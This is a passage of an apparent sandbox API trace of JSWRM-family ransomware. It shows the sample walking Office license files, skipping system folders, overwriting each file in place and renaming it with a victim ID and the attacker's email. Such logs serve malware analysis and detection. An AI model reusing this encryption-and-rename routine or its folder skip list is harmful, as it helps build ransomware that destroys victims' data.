MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0102.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0102.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0102.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0102.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0102.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.652] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0102.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0102.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0102.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0102.653] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2f2c57f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2f2c57f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe314269a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d45, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Grace-ul-oob.xrm-ms", cAlternateFileName="EXCELR~2.XRM")) returned 1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.653] lstrcmpiW (lpString1="ExcelR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0102.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0102.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0102.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241038, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0102.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.654] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11589) returned 1 [0102.654] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0102.654] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0102.679] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.679] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0102.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.679] CloseHandle (hObject=0x45c) returned 1 [0102.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0102.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0102.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0102.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.680] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0102.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0102.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0102.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.680] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2dd500f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2dd500f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2feb0e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x298b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_OEM_Perp-pl.xrm-ms", cAlternateFileName="EXCELR~1.XRM")) returned 1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2=".") returned 1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="..") returned 1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="...") returned 1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="windows") returned -1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="recovery") returned -1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.681] lstrcmpiW (lpString1="ExcelR_OEM_Perp-pl.xrm-ms", lpString2="msocache") returned -1 [0102.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0102.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0102.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-pl.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241128, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0102.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.681] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.682] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10635) returned 1 [0102.682] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0102.682] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0102.684] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.684] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0102.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.684] CloseHandle (hObject=0x45c) returned 1 [0102.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0102.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0102.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0102.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0102.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.685] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.685] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0102.686] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe34fc158, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe34fc158, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe38697b8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x516e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_OEM_Perp-ppd.xrm-ms", cAlternateFileName="EX46CD~1.XRM")) returned 1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2=".") returned 1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="..") returned 1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="...") returned 1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="windows") returned -1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.686] lstrcmpiW (lpString1="ExcelR_OEM_Perp-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0102.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240f20, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0102.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0102.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_OEM_Perp-ppd.xrm-ms", cchWideChar=26, lpMultiByteStr=0x240fe8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_OEM_Perp-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0102.686] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.686] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.686] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_OEM_Perp-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_oem_perp-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.687] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20846) returned 1 [0102.687] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5160) returned 0x24c1d0 [0102.687] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5160, lpOverlapped=0x0) returned 1 [0102.741] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.741] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5160, lpOverlapped=0x0) returned 1 [0102.741] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.741] CloseHandle (hObject=0x45c) returned 1 [0102.741] 